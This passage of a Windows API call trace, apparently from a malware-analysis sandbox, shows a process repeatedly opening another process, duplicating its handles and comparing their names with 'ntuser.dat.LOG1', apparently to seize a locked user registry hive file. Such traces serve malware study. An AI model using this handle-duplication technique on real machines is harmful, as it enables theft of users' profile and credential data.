hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.846] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.847] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.847] CloseHandle (hObject=0x670) returned 1 [0151.847] _wcsicmp (_Str1="\\MOF", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.847] CloseHandle (hObject=0x680) returned 1 [0151.847] CloseHandle (hObject=0x62c) returned 1 [0151.847] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.847] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.848] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.848] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.848] CloseHandle (hObject=0x670) returned 1 [0151.848] CloseHandle (hObject=0x680) returned 1 [0151.849] CloseHandle (hObject=0x62c) returned 1 [0151.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.849] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.849] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.850] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.850] CloseHandle (hObject=0x670) returned 1 [0151.850] CloseHandle (hObject=0x680) returned 1 [0151.850] CloseHandle (hObject=0x62c) returned 1 [0151.850] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.850] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.851] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.852] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.852] CloseHandle (hObject=0x670) returned 1 [0151.852] CloseHandle (hObject=0x680) returned 1 [0151.852] CloseHandle (hObject=0x62c) returned 1 [0151.852] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.852] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.853] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.853] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.854] CloseHandle (hObject=0x670) returned 1 [0151.854] CloseHandle (hObject=0x680) returned 1 [0151.854] CloseHandle (hObject=0x62c) returned 1 [0151.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.854] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.854] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.855] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.855] CloseHandle (hObject=0x670) returned 1 [0151.855] CloseHandle (hObject=0x680) returned 1 [0151.855] CloseHandle (hObject=0x62c) returned 1 [0151.855] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.855] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.860] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.861] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.861] CloseHandle (hObject=0x670) returned 1 [0151.861] CloseHandle (hObject=0x680) returned 1 [0151.861] CloseHandle (hObject=0x62c) returned 1 [0151.861] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.861] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.862] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.863] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.864] CloseHandle (hObject=0x670) returned 1 [0151.864] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.864] CloseHandle (hObject=0x680) returned 1 [0151.864] CloseHandle (hObject=0x62c) returned 1 [0151.864] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.864] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x954, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.864] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.865] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.865] CloseHandle (hObject=0x670) returned 1 [0151.866] _wcsicmp (_Str1="\\MAPPING1.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.866] CloseHandle (hObject=0x680) returned 1 [0151.866] CloseHandle (hObject=0x62c) returned 1 [0151.866] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.866] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x958, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.866] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.867] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.867] CloseHandle (hObject=0x670) returned 1 [0151.867] _wcsicmp (_Str1="\\MAPPING2.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.867] CloseHandle (hObject=0x680) returned 1 [0151.867] CloseHandle (hObject=0x62c) returned 1 [0151.867] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.867] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x95c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.867] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.868] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.868] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.869] CloseHandle (hObject=0x670) returned 1 [0151.869] _wcsicmp (_Str1="\\MAPPING3.MAP", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.869] CloseHandle (hObject=0x680) returned 1 [0151.869] CloseHandle (hObject=0x62c) returned 1 [0151.869] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.869] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x960, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.869] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.869] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.870] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.870] CloseHandle (hObject=0x670) returned 1 [0151.870] _wcsicmp (_Str1="\\OBJECTS.DATA", _Str2="\\ntuser.dat.LOG1") returned 1 [0151.870] CloseHandle (hObject=0x680) returned 1 [0151.870] CloseHandle (hObject=0x62c) returned 1 [0151.870] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.870] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.871] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.872] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.872] CloseHandle (hObject=0x670) returned 1 [0151.872] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\ntuser.dat.LOG1") returned -5 [0151.872] CloseHandle (hObject=0x680) returned 1 [0151.872] CloseHandle (hObject=0x62c) returned 1 [0151.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.873] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.873] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.874] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.874] CloseHandle (hObject=0x670) returned 1 [0151.874] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.874] CloseHandle (hObject=0x680) returned 1 [0151.874] CloseHandle (hObject=0x62c) returned 1 [0151.874] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.874] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa2c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.875] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.875] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.875] CloseHandle (hObject=0x670) returned 1 [0151.875] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\ntuser.dat.LOG1") returned -10 [0151.875] CloseHandle (hObject=0x680) returned 1 [0151.876] CloseHandle (hObject=0x62c) returned 1 [0151.876] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.876] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.876] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.877] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.877] CloseHandle (hObject=0x670) returned 1 [0151.877] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.877] CloseHandle (hObject=0x680) returned 1 [0151.877] CloseHandle (hObject=0x62c) returned 1 [0151.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.877] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.878] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.878] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.878] CloseHandle (hObject=0x670) returned 1 [0151.879] _wcsicmp (_Str1="\\srvsvc", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.879] CloseHandle (hObject=0x680) returned 1 [0151.879] CloseHandle (hObject=0x62c) returned 1 [0151.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.879] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.879] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.880] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.880] CloseHandle (hObject=0x670) returned 1 [0151.880] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -8 [0151.880] CloseHandle (hObject=0x680) returned 1 [0151.880] CloseHandle (hObject=0x62c) returned 1 [0151.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.880] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.881] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.882] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.882] CloseHandle (hObject=0x670) returned 1 [0151.882] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.882] CloseHandle (hObject=0x680) returned 1 [0151.882] CloseHandle (hObject=0x62c) returned 1 [0151.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.882] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.883] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.884] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.884] CloseHandle (hObject=0x670) returned 1 [0151.884] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.884] CloseHandle (hObject=0x680) returned 1 [0151.884] CloseHandle (hObject=0x62c) returned 1 [0151.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.884] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1114, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.885] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.886] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.886] CloseHandle (hObject=0x670) returned 1 [0151.886] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0151.886] CloseHandle (hObject=0x680) returned 1 [0151.886] CloseHandle (hObject=0x62c) returned 1 [0151.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.886] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.887] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.887] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.887] CloseHandle (hObject=0x670) returned 1 [0151.887] CloseHandle (hObject=0x680) returned 1 [0151.887] CloseHandle (hObject=0x62c) returned 1 [0151.887] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.887] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.888] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.889] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.889] CloseHandle (hObject=0x670) returned 1 [0151.889] CloseHandle (hObject=0x680) returned 1 [0151.889] CloseHandle (hObject=0x62c) returned 1 [0151.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0151.889] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.890] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.890] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.891] CloseHandle (hObject=0x670) returned 1 [0151.891] _wcsicmp (_Str1="\\edb.log", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.891] CloseHandle (hObject=0x680) returned 1 [0151.891] CloseHandle (hObject=0x62c) returned 1 [0151.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0151.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.891] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.892] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.893] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.893] CloseHandle (hObject=0x670) returned 1 [0151.893] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.893] CloseHandle (hObject=0x680) returned 1 [0151.893] CloseHandle (hObject=0x62c) returned 1 [0151.893] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.893] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.894] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.895] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.895] CloseHandle (hObject=0x670) returned 1 [0151.895] CloseHandle (hObject=0x680) returned 1 [0151.895] CloseHandle (hObject=0x62c) returned 1 [0151.895] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.895] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.896] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.897] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.897] CloseHandle (hObject=0x670) returned 1 [0151.897] CloseHandle (hObject=0x680) returned 1 [0151.897] CloseHandle (hObject=0x62c) returned 1 [0151.897] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.897] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.898] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.898] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.898] CloseHandle (hObject=0x670) returned 1 [0151.898] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.898] CloseHandle (hObject=0x680) returned 1 [0151.898] CloseHandle (hObject=0x62c) returned 1 [0151.898] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0151.898] DuplicateHandle (in: 